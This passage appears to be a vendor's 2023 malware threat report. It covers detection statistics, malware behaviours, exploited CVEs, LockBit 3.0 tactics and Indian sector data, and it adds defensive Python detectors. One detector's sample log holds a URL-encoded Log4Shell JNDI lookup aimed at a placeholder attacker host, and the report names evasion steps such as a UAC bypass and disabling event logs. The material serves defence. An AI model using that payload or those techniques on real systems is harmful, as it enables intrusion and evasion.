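    quarantine_pid: Optional[int] = None


def evaluate(ev: ProcessEvent) -> Verdict:
    """Apply the response the report describes: the LOLbin is a trusted system
    binary, so its process is terminated but the binary itself is never
    quarantined; the parent that drove it is what gets quarantined."""
    image, parent = ev.image.lower(), ev.parent_image.lower()
    if image not in LOLBINS:
        return Verdict(ev.pid, "allow", "not a monitored LOLbin")
    if parent in HIGH_RISK_PARENTS:
        return Verdict(ev.pid, "terminate+quarantine_parent",
                       f"{image} spawned by document/mail/script host {parent}", ev.ppid)
    if parent not in EXPECTED_PARENTS:
        return Verdict(ev.pid, "terminate+quarantine_parent",
                       f"{image} spawned by unexpected parent {parent}", ev.ppid)
    return Verdict(ev.pid, "allow", f"{image} launched from expected parent {parent}")


def triage(events: List[ProcessEvent]) -> List[Verdict]:
    """Return only the verdicts that require a response."""
    return [v for v in map(evaluate, events) if v.action != "allow"]


# Constructed sample telemetry (not real data)
SAMPLE_EVENTS = [
    ProcessEvent(101, "certutil.exe", 50, "cmd.exe"),          # admin hashing a file
    ProcessEvent(102, "certutil.exe", 77, "WINWORD.EXE"),      # spawned from a document
    ProcessEvent(103, "wmic.exe", 78, "wscript.exe"),          # script host driving WMI
    ProcessEvent(104, "wmic.exe", 79, "updater_helper.exe"),   # unknown parent
    ProcessEvent(105, "notepad.exe", 50, "explorer.exe"),      # unrelated process
]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_EVENTS):
        print(verdict)
```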
Monthly malware and ransomware figures, December 2022 to November 2023 (values in the order the charts list them):
Total malware detections (mn): 37.97, 33.67, 32.84, 36.68, 35.32, 36.24, 44.93, 33.89, 30.96, 33.06, 29.17, 30.82
Total malware incidents: 708, 971, 1103, 939, 962, 995, 869, 971, 1070, 928, 903, 722
Total ransomware detections: 90588, 83985, 128287, 117529, 113313, 115003, 316105, 108189, 165634, 99463, 89327, 96295
Total ransomware incidents: 163, 302, 301, 219, 191, 181, 138, 148, 185, 198, 155, 166
Malware and Ransomware Analysis (Year 2023)
Decrypting the Menace: Unveiling the Inherent Risks of Ransomware
Ransomware: ~1 incident per 650 detections
Malware: ~1 incident per 38000 detections
This section examines incident trends and detections from December 2022 to November 2023, focusing on the total incidents vs. total detections ratio as a key measure of detection efficiency. The prevalence of ransomware is higher due to its increased difficulty of detection in comparison to conventional malware. A lower ratio signals a more effective detection mechanism, implying a higher success rate in identifying attacks.
~95 mn detections can be attributed to the malware families listed below.

W32.Pioneer.CZ1
Detections: 50.70 mn | Threat Level: Medium | Category: File Infector
Method of Propagation: Removable or network drives
Behaviour: The malware injects its code into files present on the disk and on shared network drives. It decrypts a malicious .dll present in the file and drops it. This .dll performs malicious activities, collects system information and sends it to a 'CNC' server.

Worm.AUTOIT.Tupym.A
Detections: 6.21 mn | Threat Level: Medium | Category: Worm
Method of Propagation: Malicious links in instant messenger
Behaviour: The malware drops a file in the system32 folder and executes it from the dropped location. It connects to a malicious website and also modifies the browser home page to another site via a registry entry. It also creates a Run entry for the same dropped file for persistence.

W32.Mofksys
Detections: 8.40 mn | Threat Level: High | Category: Worm
Method of Propagation: Removable or network drives
Behaviour: It copies itself to the following paths: <System>\explorer.exe, <Windows>\svchost.exe, <Windows>\spoolsv.exe, and adds these paths to the RunOnce registry key. It can capture activity such as keyboard/mouse inputs, including screen captures, and pass it to the remote intruder. It drops a copy of itself on other machines in the network through writable shared drives and further uses sc.exe to execute remotely as a service.

Trojan.Starter.YY4
Detections: 7.71 mn | Threat Level: High | Category: Trojan
Method of Propagation: Email attachments and malicious websites
Behaviour: Creates a process to run the dropped executable file. Modifies computer registry settings, which may cause a system crash. Downloads other malware such as keyloggers. Slows down booting and shutting down of the infected computer. Allows hackers to steal confidential data such as credit card details and personal information from the infected system.

Nsis.Bitmin
Detections: 3.38 mn | Threat Level: Medium | Category: Worm
Method of Propagation: Emails and malicious websites
Behaviour: It drops and replicates itself in the "%APPDATA%\temp" directory. It then extracts inner files named "uihost64.exe" and "uihost32.exe", storing them in the Temp folder. To ensure persistence, it alters a registry key:
Registry Entry: <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run

LNK.Cmd.Exploit.F
Detections: 7.63 mn | Threat Level: High | Category: Trojan
Method of Propagation: Email attachments and malicious websites
Behaviour: Uses cmd.exe with the "/c" command line option to execute other malicious files. It simultaneously executes a malicious .vbs file named "help.vbs" along with a malicious .exe file. The malicious .vbs file uses the Stratum mining protocol for Monero mining.
HTM.Nimda.A
Detections: 2.33 mn | Threat Level: Medium | Category: Worm
Method of Propagation: Spreads through emails
Behaviour: The worm spreads by sending email attachments named 'README.EXE'. It exploits CVE-2001-0154 by setting an unusual MIME header type on an HTML email containing the executable attachment. The worm infects files on victim machines and network drives.

W32.Runouce.B
Detections: 2.05 mn | Threat Level: Medium | Category: Virus
Method of Propagation: Spreads through emails
Behaviour: It sends a copy of itself as an email attachment to the email IDs present in the victim's contact lists. It drops the copy in the %system% folder as 'runouce.exe' with hidden attributes. Creates a mutex named 'ChineseHacker-2'.

W32.Neshta.C8
Detections: 1.53 mn | Threat Level: Medium | Category: Virus
Method of Propagation: Removable or network drives
Behaviour: Copies the virus code to the start of a clean file and keeps the clean file's content at the end. Drops files at the paths <Windows>\svchost.com and <Windows>\directx.sys.
A significant portion, over 50%, of the detected threats stem from removable media and network drives, highlighting potential vulnerabilities in external storage and network security. Approximately 25% of detections result from engaging with malicious links in emails and websites, highlighting the critical role of robust email and web security measures. Additionally, around 20% of the identified threats propagate through emails using file infectors. Of particular concern, 26% of these detections fall into the category of high-threat incidents, warranting immediate attention.

TOP 10 FILES COMMONLY FOUND WITH MALICIOUS CODE
clean.exe
KMS-R@1n.exe
SECOH-QAD.dll
DOC001.exe
SECOH-QAD.exe
utopico.exe
SppExtComObjHook.dll
mssecsvc.exe
DriverPackNotifier.exe
Service_KMS.exe
Top Network Based Exploits
As organizations navigate the intricacies of complex network infrastructures, identifying and comprehending the methodologies employed by cyber
adversaries is crucial. This section delves into specific exploits that pose significant risks to network security.
CVE-2017-0147 highlights an information
disclosure vulnerability within the Microsoft
Server Message Block 1.0 (SMBv1) server.
The vulnerability originates from the
server’s handling of particular requests,
providing an avenue for attackers to create
a specifically tailored packet. Exploiting this
vulnerability has the potential to lead to the
disclosure of information from the server.
Typically, this exploitation scenario entails
an unauthenticated attacker transmitting
the specially crafted packet to a designated
SMBv1 server.
CVE-2017-0144, known as EternalBlue, is a critical security vulnerability affecting Microsoft Windows operating systems, particularly in the Server Message Block (SMB) protocol. Exploitation of EternalBlue enables remote attackers to execute arbitrary code on a target system without user interaction. The most notable instance of this exploit was witnessed during the WannaCry ransomware attack in May 2017, where the malware rapidly spread across unpatched systems, encrypting files and demanding ransom payments. This incident underscores the significance of promptly applying security updates to mitigate known vulnerabilities.
Figure: SMB exploit detections (SMB/EternalBlue.UN!SP.31780, SMB/Autoblue.UN!SP.30735, SMB/CVE-2017-0147-EC.WIN!KP.1912; Server Message Block, WannaCry ransomware attack in May 2017) and HTTP exploit targets (Mailchimp servers, eCommerce modules in Drupal, Jira Server, LDAP servers, DB files).
Network Exploit Detections
SMB/CVE-2017-0147-EC.WIN!KP.1912    175 mn
SMB/EternalBlue.UN!SP.31780         155 mn
SMB/Autoblue.UN!SP.30735             65 mn
HTTP/CVE-2017-9841.RCE!PT.42647     1.3 mn
HTTP/CVE-2021-26086.Jira!PT.44523   0.1 mn
HTTP/CVE-2021-44228.RCE!AW.45158    0.4 mn
HTTP/CVE-2017-9841.RCE!PT.42647
CVE-2017-9841 is a critical code injection vulnerability in PHPUnit's Util/PHP/eval-stdin.php; it allows remote attackers to exploit the flaw by sending HTTP POST data beginning with a '<?php ' substring. An unauthenticated attacker who can reach the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI could execute arbitrary PHP code. This security risk impacts the Mailchimp and Mailchimp E-Commerce modules in Drupal, collectively used by a substantial number of sites. The vulnerability is attributed to the use of the php://input wrapper in the /phpunit/src/Util/PHP/eval-stdin.php file; patched versions of PHPUnit address the issue by adopting the php://stdin wrapper.
HTTP/CVE-2021-26086.Jira!PT.44523
This detection pertains to CVE-2021-26086, a path traversal
vulnerability in Jira Server and Data Center that exposes a
critical security flaw. Actively exploited, this vulnerability
allows remote attackers to read arbitrary files on the server by
sending a specifically crafted HTTP request to the /WEB-INF/
web.xml endpoint.
HTTP/CVE-2021-44228.RCE!AW.45158
CVE-2021-44228, also known as Log4Shell, is a critical remote code execution vulnerability affecting systems that use the affected Apache Log4j 2 versions, where the JNDI features used in configuration, log messages, and parameters lack protection against attacker-controlled LDAP and other JNDI-related endpoints.
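An added example (not code from the report) of detection logic for the three HTTP exploit signatures described above, run over constructed web-server access-log lines; the combined-log-format layout, the documentation-range client IPs and the placeholder host attacker.example are assumptions.

```python
"""Detection logic for the three HTTP exploit signatures above
(CVE-2017-9841, CVE-2021-26086, CVE-2021-44228) over web-server access logs.

Added example, not code from the report. The log lines are constructed and
the combined-log-format layout is assumed.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def decode(value: str) -> str:
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (client_ip, matched CVEs) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    path = decode(f["path"])
    hits: List[str] = []
    # CVE-2017-9841: POST body evaluated by PHPUnit's eval-stdin.php
    if f["method"] == "POST" and path.split("?", 1)[0].lower().endswith("/util/php/eval-stdin.php"):
        hits.append("CVE-2017-9841")
    # CVE-2021-26086: traversal that reaches Jira's /WEB-INF/web.xml
    if "/web-inf/web.xml" in path.lower():
        hits.append("CVE-2021-26086")
    # CVE-2021-44228: JNDI lookup string in any logged, attacker-controlled field
    for field in (path, decode(f["referer"]), decode(f["ua"])):
        if "${jndi:" in field.lower():
            hits.append("CVE-2021-44228")
            break
    return f["ip"], hits


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Aggregate matches per client IP: {ip: sorted CVE list}."""
    findings: Dict[str, set] = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            findings.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(cves) for ip, cves in findings.items()}


# Constructed sample log (documentation-range IPs; "attacker.example" is a placeholder)
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Mar/2023:10:01:02 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2023:10:02:15 +0530] "GET /%57EB-INF/web.xml HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    '198.51.100.9 - - [12/Mar/2023:10:03:40 +0530] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [12/Mar/2023:10:04:01 +0530] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, cves in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(cves))
```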
Top Host Based Exploits
This section casts a spotlight on host-based exploits, a critical facet of the digital threat landscape. Examining the detections of prominent host-based exploits, including LNK.Exploit.Gen, LNK.Cmd.Exploit.F, LNK.Exploit.Cpl.Gen, LNK.USB.Exploit, and JPEG.Exploit.ms04-028, the focus lies on understanding the prevalence and impact of these exploits on individual computer hosts. Each detection represents a potential gateway for cyber adversaries to compromise system integrity and extract sensitive information. By scrutinizing these instances, the report aims to provide valuable insights into the tactics employed by attackers and equip cybersecurity practitioners with the knowledge needed to strengthen defences.
Host Based Exploit Detections
LNK.Exploit.Gen            55,11,892 (~5.5 mn)
LNK.Cmd.Exploit.F        1,51,18,452 (~15.1 mn)
LNK.Exploit.Cpl.Gen        15,14,979 (~1.5 mn)
LNK.USB.Exploit             3,12,667
JPEG.Exploit.ms04-028       6,23,886
LNK/Pantera is classified as a trojan, a type of malware that performs activities without the user's knowledge. These activities commonly include establishing remote access connections, capturing keyboard input, collecting system information, downloading/uploading files, dropping other malware into the infected system, performing denial-of-service (DoS) attacks, and running/terminating processes.
Dorkbot, a widespread botnet, specializes in stealing online payments, conducting distributed denial-of-service (DDoS) attacks, and delivering various malware types. Used globally, it poses a significant threat. Dorkbot-infected systems are weaponized for cybercrime, enabling the theft of sensitive data, initiation of DoS attacks, disabling of security safeguards, and distribution of multiple malware strains. Typically, Dorkbot spreads through malicious links in social networks, instant messaging programs, or infected USB devices. Its backdoor functionality empowers remote attackers to download and execute files, harvest logon information, and manipulate domain access. Vigilance is crucial to thwart this pervasive threat.
The Jenxcus worm family poses a significant threat by granting unauthorized access to and control of your PC to malicious hackers. Additionally, it can collect and transmit your personal information to these attackers. Infection commonly occurs through drive-by download attacks or by visiting compromised webpages, and it can also be introduced through infected removable drives. Users should exercise caution to mitigate the risk of this intrusive and potentially harmful threat.
Dinihou, a worm, gains entry through
removable drives and is typically introduced
to a system as a file dropped by other
malware or unknowingly downloaded by
users visiting malicious websites. Once
present, it replicates by dropping copies of
itself onto all connected removable drives.
Worms like Dinihou have an inherent ability
to autonomously propagate to other PCs,
utilizing various methods such as copying
to removable drives, network folders, or
spreading through email. This autonomous
spread increases the risk of widespread
infection and underscores the importance of
proactive security measures.
This detection covers malware exploiting CVE-2010-2568, a critical remote code execution vulnerability present in specific Microsoft Windows versions. The vulnerability stems from the incorrect parsing of shortcuts, enabling the execution of malicious code upon opening an infected LNK file. Notably, this flaw was exploited by the Stuxnet threat and other malware families. It also played a significant role in exploit kits used for cyber-espionage campaigns.
Android Detections 2023
Mobile devices continue to replace laptops and desktop computers for
many functions, including electronic banking, mobile payments, messaging
apps, and social networks. In fact, 60% of all Internet traffic in 2022 was
generated by mobile devices.
In 2022, nearly 71% of mobile devices worldwide used the Android
operating system.
In 2023, the following threats were observed:
- Significant rise in Adware and Potentially Unwanted Applications (PUAs).
- Malware continues to dominate as a threat for Android.
- Based on the analysis of 500K installations, it was observed that approximately 2-3 attacks per month are detected on Android mobiles.
- Given the extensive use of mobile devices for office work, this poses a significant risk to corporate networks if these attacks go undetected in the absence of Android protection.

Share of detections across the 500K installation base: Malware 39%, PUA 29%, Adware 32%.
Top Zero Days of 2023
This section spotlights the top zero-day vulnerabilities of 2023, listing for each the method of exploitation, the target and the impact.
Method / Target / Description
1. CVE-2023-34362 | SQL Injection | Target: MOVEit Transfer | Grants access to the MOVEit Transfer database if exploited by unauthorized individuals.
2. CVE-2023-3460 | Privilege Escalation | Target: User registration and account management plugin in the WordPress CMS | Creates users with admin privileges on WordPress websites running vulnerable versions of the Ultimate Member WordPress Plugin.
3. CVE-2023-23397 | Privilege Escalation | Target: Windows Microsoft Outlook | Authenticate as the intended user and launch relay attacks.
4. CVE-2023-36884 | Remote Code Execution | Target: Windows HTML and Microsoft Office | Run scripts remotely and get beyond established system defenses.
5. CVE-2023-38831 | File extension Spoofing | Target: WinRAR | Contains executable content to process desired actions.
CVE-2023-34362: SQL Injection in MOVEit Transfer
The discovery of a zero-day vulnerability in MOVEit Transfer has drawn attention to the risk of unauthorized access, as MOVEit Transfer is widely recognized as a secure and popular managed file transfer program used by enterprises to transfer data safely over protocols such as SFTP, SCP, and HTTP-based uploads. If exploited by unauthorized individuals, the SQL injection vulnerability can grant them access to the MOVEit Transfer database. This vulnerability is actively targeted, with attackers leveraging HTTP or HTTPS channels to exploit unpatched systems.

CVE-2023-36884: Remote Code Execution in Microsoft Office and Windows HTML
A major security flaw in Windows HTML and Microsoft Office has been identified as CVE-2023-36884. It represents a particular kind of threat called "Remote Code Execution," which basically gives an attacker a way to run scripts remotely and get beyond established system defenses. The exploit involves creating Microsoft Office documents with malicious intent in order to run remote malware.

CVE-2023-23397: Microsoft Outlook Privilege Escalation
The Windows Microsoft Outlook client has a vulnerability, CVE-2023-23397, that may be exploited by sending a specially crafted email that sets off an automatic trigger when the Outlook client processes it. The exploit can be activated without any involvement from the user.
The Net-NTLMv2 hashes of the targeted user will be exposed if the vulnerability is exploited. The threat actor might then use this to authenticate as the intended user and launch relay attacks against additional systems that support NTLMv2.

CVE-2023-38831: File extension Spoofing in WinRAR
CVE-2023-38831 is an RCE vulnerability in WinRAR prior to version 6.23. The problem arises because a ZIP archive may contain both a harmless file (such as a regular .JPG file) and a folder with the same name as the harmless file. When an attempt is made to retrieve only the benign file, the contents of the folder, which can contain executable content, are processed.

CVE-2023-3460: A Privilege Escalation Vulnerability in Ultimate Member WordPress Plugin
A well-known user registration and account management plugin in the WordPress content management system has a privilege escalation vulnerability that allows malicious actors to create users with admin privileges on WordPress websites running vulnerable versions of the Ultimate Member WordPress Plugin. It can have serious repercussions, such as the WordPress website being completely taken over or compromised.
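An added example, not code from the report: a pre-extraction check for the archive layout described under CVE-2023-38831, a file entry and a folder carrying the same name, run against archives constructed in memory from harmless text.

```python
"""Pre-extraction check for the archive layout behind CVE-2023-38831: a file
entry and a directory entry carrying the same name.

Added example, not code from the report. The archives are built in memory
from harmless text so the check can be exercised offline.
"""
import io
import zipfile
from typing import List


def colliding_names(zf: zipfile.ZipFile) -> List[str]:
    """Names present both as a file and as a directory (explicit "dir/" entry
    or implied by a nested path). Trailing whitespace is trimmed so that
    near-identical names are compared as the user would see them."""
    files, dirs = set(), set()
    for info in zf.infolist():
        name = info.filename
        parts = name.rstrip("/").split("/")
        if name.endswith("/"):
            dirs.add("/".join(parts).rstrip())
            continue
        files.add(name.rstrip())
        for i in range(1, len(parts)):             # every parent prefix is a directory
            dirs.add("/".join(parts[:i]).rstrip())
    return sorted(files & dirs)


def is_suspicious(data: bytes) -> bool:
    """True when the archive should be held back instead of extracted."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return bool(colliding_names(zf))


def build_sample(collide: bool) -> bytes:
    """Constructed archives: a benign layout, or a harmless file next to a
    folder of the same name as the report describes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("regular.JPG", "constructed sample, not an image")
        if collide:
            zf.writestr("regular.JPG/part.txt", "constructed sample")
        else:
            zf.writestr("notes/readme.txt", "constructed sample")
    return buf.getvalue()


def sample_collisions(collide: bool) -> List[str]:
    """Run the check on one of the constructed archives."""
    with zipfile.ZipFile(io.BytesIO(build_sample(collide))) as zf:
        return colliding_names(zf)


if __name__ == "__main__":
    for flag in (False, True):
        print("collide" if flag else "benign", "->", sample_collisions(flag))
```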
India Malware Landscape
India Malware Landscape: Geographical Analysis
290 mn Detections
Top 10 States with Highest Malware Detections
~70% of the total detections originate from these states.

State            Detections   % detections per endpoint
Maharashtra      71.68 mn     09%
Delhi            60.64 mn     11%
Gujarat          51.99 mn     11%
West Bengal      27.90 mn     08%
Karnataka        23.69 mn     10%
Uttar Pradesh    21.53 mn     07%
Tamil Nadu       20.14 mn     14%
Telangana        13.88 mn     15%
Haryana          11 mn        08%
Madhya Pradesh   9.26 mn      07%

Source: https://www.surveyofindia.gov.in/pages/outline-maps-of-india
Disclaimer: The data that has been rationalized and the insights provided are depicted as per SEQRITE installation base.
The number of detections varies across different states of India, depending on the installation base, the availability of computing devices, and the presence of IT/ITeS industries.
Telangana and Tamil Nadu have the highest ratio of detections per installation, while Maharashtra, Gujarat and Delhi have the highest absolute number of detections.
Gujarat and Madhya Pradesh show an increase in detections, reflecting the emergence of new IT/ITeS hubs in these states.
160 mn Detections
Top 10 Cities with Highest Malware Detections
~40% of the total detections originate from these cities.
Figure: map of the top 10 cities (Mumbai, Pune, Bengaluru, Kolkata, Delhi NCR, Chennai, Hyderabad, Surat, Ahmedabad, Gurgaon) showing, for each city, absolute detections (from 7.5 mn to ~27 mn) and % detections per endpoint (from 06% to 15%).
A city-wise analysis reveals that Mumbai, Pune, Chennai and Bangalore have the highest number of detections in absolute terms. Surat and Ahmedabad, which have emerged as new IT/ITeS hubs, have high detections relative to their installation base.
The top 10 cities account for more than 50% of the detections, while the remaining detections are spread across tier II and III cities and towns in India. This may be due to the rise of work-from-hometown culture amid the pandemic.
India Malware Landscape: Sectoral Analysis
INDUSTRY-WISE PERCENTAGE DETECTIONS PER INSTALLATION BASE
Automobile Supply Chain          13%
Government                       10%
Education                        10%
Power & Energy                    8%
Hospitality                       8%
Healthcare                        8%
Logistics                         7%
Media & Entertainment             7%
Manufacturing                     6%
Strategic & Public Enterprises    5%
Transport                         5%
Professional Services             4%
Telecom                           4%
IT/ITES                           2%
BFSI                              3%
The Automotive Supply Chain, Government and Education are the top three industry segments with the highest malware detections per installation base across the industry.
The automotive industry, which was once relatively immune to widespread and notorious threats, has become a prime target for malicious actors who seek to disrupt operations, steal sensitive data, and compromise supply chains. In 2023, we observed an escalation in both the volume and the impact of cyber-attacks on the auto industry.
India is one of the most vulnerable countries to state-sponsored threat actors, especially those targeting government agencies. Some of these cyber attacks are orchestrated by state-backed actors on strategic occasions such as the G20 summit.
The Education sector faces common attack vectors such as phishing and user account compromise. User account compromise is prevalent in this sector, as it manages a variety of accounts for staff, third-party contractors, educators, students, alumni, etc., with a high turnover rate. The most dominant threat in the education sector was W32.Neshta.C8, a malicious software that poses a formidable challenge to educational institutions.
The Power and Energy sector in India is a critical
component of the country’s economic growth story,
making it a lucrative target for cyber attackers that
can cause significant service disruptions and physical
damage to infrastructure. The attackers target different
departments such as supply and procurement, cloud
and infrastructure, legal, IT and OT. Cyber supply chain
risk visibility is essential to mitigate threats in this
sector. The revived new variant of Expiro infector has
the highest detections in this sector.
As India progresses towards digitalizing the healthcare
sector, it has become imperative to secure the online
systems. According to a new study by Sophos, a UK-
based cybersecurity firm, reported by the Economic
Times, nearly 60% of healthcare organizations in India
have experienced a cyberattack in the past 12 months.
Nimda variant was the most prominent threat with the
highest detections in the Healthcare and Hospitality
segment.
Indian manufacturing firms faced increased risks from
unsecured IoT devices connected to the network, more
than any other sector. Manufacturing organizations
believe that 5G adoption will exacerbate security gaps.
The sector suffered ransomware attacks that halted
manufacturing operations. The SMEs in this segment
endured sophisticated social engineering phishing
attacks.
In addition to manufacturing, the logistics, banking
and financial sectors are also under the radar of
cyber-attacks. The financial sector is leading the digital
transformation and with the platform economy in
action, attacks on low-value transaction businesses
are also relevant. Lending apps that request access
to sensitive information surged in India during this
period.
Power & Energy: W32.Expiro.R3
~2,000 endpoints | 13,000+ detections | ~5 in every 10 detections
Trait: Infects files by appending its virus code to them. Enters the system through cracked software, drive-by downloads, malvertising campaigns, etc. Steals browser certificates and passwords and stores them at %AppData%\<random_hex_values>.bin. Creates mutexes.

Automobiles: Trojan.NSIS.Miner.SD
~11,800 endpoints | 2,17,000+ detections | ~6 in every 10 detections
Trait: Gains access via hacked sites/links, installs from malicious sources, auto-runs on startup, alters system files/registry, degrades performance with resource-intensive bitcoin mining, and opens a backdoor for other malware.

Government: Remoteadmin.Remoteexec
~2,84,000 endpoints | 3,04,000+ detections | ~2 in every 10 detections
Trait: Enables remote installation, execution, and updates of applications, programs, and files on Windows network systems.

Education: W32.Neshta.C8
~1,58,000 endpoints | 8,53,000+ detections | ~4 in every 10 detections
Trait: It self-extracts data, executes a dropped binary, and establishes autorun at Windows startup.
Logistics: Trojan.YakbeexMSIL.ZZ4
~3,900 endpoints | 11,000+ detections | ~2 in every 10 detections
Trait: Employs multiple techniques: extracting code, creating memory, dropping/executing binaries, using Windows utilities, keystroke logging, autorun at startup, file attribute manipulation for a false deletion appearance, self-replication, altering Explorer settings, encrypting files, and obstructing access to the victim's workstation.

Professional Services: Trojan.KillAv.DR
~2,85,000 endpoints | 5,02,000+ detections | ~2 in every 10 detections
Trait: Drops a file and can deliver and execute well-known malware like Skype spy or antivirus service killers; it also transmits victims' IP addresses and related data to the malware authors, often disguising itself with icons resembling genuine Windows applications.

Media & Entertainment: Trojan.Rdpwrap
~13,800 endpoints | 10,500+ detections | ~1 in every 10 detections
Trait: Introduces a vulnerability, allowing potential hackers to infiltrate and deploy Trojan horse software for unauthorized data access and control.

Manufacturing: PIF.StucksNet.A
~2,20,000 endpoints | 3,32,000+ detections | ~1 in every 10 detections
Trait: Deploys a .LNK file as a shortcut to its main executable, leveraging CVE-2010-2568 to execute arbitrary code on victim machines, a vulnerability famously exploited in Stuxnet.

Transport: Script.Trojan.A3676696
~1,600 endpoints | 4,700+ detections | ~4 in every 10 detections
Trait: Quarantine to prevent spreading or removes files entirely as per F-Secure security settings.

BFSI: W32.Pioneer.CZ1
~47,000 endpoints | 87,000+ detections | ~5 in every 10 detections
Trait: Infects files, deploys a malicious DLL, and sends system information to a remote server.
Strategic & Public Enterprises: Trojan.Shadowbrokers
~4,800 endpoints | 12,600+ detections | ~2 in every 10 detections
Trait: Exploits specific SMB vulnerabilities, named after the group that disclosed them, the ShadowBrokers (aka Equation group).

IT/ITES: Worm.AUTOIT.Tupym.A
~69,900 endpoints | 48,500+ detections | ~1 in every 10 detections
Trait: The malware drops and executes a file in the system32 folder, establishes a connection to a malicious website, alters the browser's start page via registry modification, and creates a persistent Run entry for the dropped file.

Telecom: Nsis.Bitmin
~1,600 endpoints | 7,000+ detections | ~7 in every 10 detections
Trait: Mines cryptocurrency, avoiding performance issues and intrusive ads, highlighting the need for its prompt removal to safeguard the system.
Featured Stories 2023
Cryptocurrency Conundrum: Unveiling the Enigma of Cryptojacking Exploits
Criticality: High
Sectors Targeted: All
Countries Affected: Worldwide
Cryptojacking is illegal cryptomining in which a cybercriminal secretly uses someone else's resources, without their knowledge or permission, to mine cryptocurrencies. Large-scale cryptojacking is emerging as a popular trend in the world of cyber crime.
Engaging in mining activities does not require extensive technical expertise, as the essential tools are frequently open-source or easily accessible for purchase. The emergence of cloud mining has heightened the risk of increased incidents. Moreover, the algorithm utilized in cryptojacking is remarkably efficient on CPUs, negating the necessity for a GPU. This efficiency enables malicious actors to deploy miners such as XMRig across devices.
Such deployments encompass cloud services, such as Kubernetes clusters used to mine the cryptocurrency Dero, and even Android devices.
Over the past year, there has been an observed increase in hits from the
NiceHashMiner payload, reaching a peak in the month of July 2023. Rise in
cross-platform malware is also observed.
Security professionals should be vigilant for the following malware
associated with Cryptojacking attacks: HonkBox (MacOS), Scrubcrypt
(targets Oracle WebLogic Servers and bypasses Windows Defender
protections), Lucifer Trojan (targets both Windows and Linux), and
QubitStrike Campaign (targets Jupiter Notebooks).
Key figures: 37% annual increase in cases; 14.3m detections; XMRig the most prominent malicious miner; cross-platform malware on the rise.
Browser-based cryptojacking flow between attacker, victim/user, website and mining service provider, as depicted in the original figure:
1. Attacker inserts a malicious script into the website.
2. Victim accesses that website.
3. Script requests a mining task.
4. Service provider assigns the task.
5. Script executes the task on the victim's machine.
6. Mining is performed.
7. Results of mining are sent to the service provider.
8. The results are sent to the attacker.
Uncovering LockBit Black’s Attack
Chain and Anti-forensic activity
Since the dissolution of the Conti ransomware group, the LockBit group has emerged as a dominant force in the ransomware landscape. This transition is marked by the adoption of new extortion techniques and the implementation of a groundbreaking bug bounty program. The LockBit 3.0 variant, subject to thorough investigation and analysis, exhibits a high-risk infection vector and a sophisticated attack chain characterized by significant anti-forensic measures.
LockBit's 3.0 variant, specifically the Black variant, has been observed engaging in anti-forensic activities. These activities include the simultaneous clearing of event logs, termination of multiple tasks, and the deletion of services. The group uses various tactics for initial network access, such as SMB brute-force attacks from diverse IPs, allowing for lateral movement across the victim's network to execute the ransomware payload.
The group uses the Sysinternals tool PsExec to execute malicious BAT files on a single system, leaving traces indicative of modifications to RDP and authentication settings, along with the simultaneous disabling of antivirus solutions. PsExec is also leveraged for lateral movement within the victim's network.
The encryption uses a multi-threaded approach, exclusively targeting shared drives. To execute the payload successfully, a valid key must be passed along with the command-line option '-pass'. Encrypted files bear the distinctive ".zbzdbs59d" extension, suggesting that the builder generates each payload with a unique, randomly generated string. Each payload must be accompanied by a valid key for file encryption to run.
In instances where Admin privileges are lacking during execution, the malware uses the CMSTPLUA COM interface to circumvent the UAC prompt, leveraging the legitimacy of the Windows Connection Manager service. Anti-debugging techniques are also observed, along with the tactic of changing the wallpaper. Despite the builder being leaked, LockBit 3.0 has ascended to the forefront of the Ransomware-as-a-Service (RaaS) model. This is attributed to the introduction of its bug bounty program and the adoption of innovative extortion tactics. Remarkably, the threat has persisted even as malicious actors create their own variants based on the leaked builder.
Criticality: High
Sectors Targeted: Healthcare, Finance,
Manufacturing, Transportation and
Government agencies.
Countries Affected: United States,
United Kingdom, Canada, Japan,
Germany, India.
Attack chain (as depicted in the original figure): Initial Access (SMB brute force of unprotected systems) -> Execution of malicious BAT scripts -> PsExec to run the ransomware -> Encryption of shared drives.
Annotated stages from the figure:
01. BAT: After initial access via SMB brute forcing, malicious BAT files are executed to modify authentication settings and disable AV (openrdp.bat, mimon.bat, auth.bat, etc.).
02. Pseudocode for decrypting PE sections: TEXT, DATA and PDATA are the three sections decrypted in memory.
03. Privilege escalation: UAC bypass using CMSTPLUA.
04. Thread Hide From Debugger: hinders dynamic analysis by preventing debug information from the current ransomware thread reaching the attached debugger.
05. Logs are disabled by setting multiple registry subkeys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels to the value 0. Specifically, Windows Defender is disabled for evasion.
06. Ransom note set as the screensaver.
07. Files are encrypted by creating multiple threads; each filename is replaced with a randomly generated string and the extension is appended. Full encryption completes in under 2 minutes.
08. Before encryption, the ransom note is created in every directory except Program Files and the Windows directory, which are not encrypted.
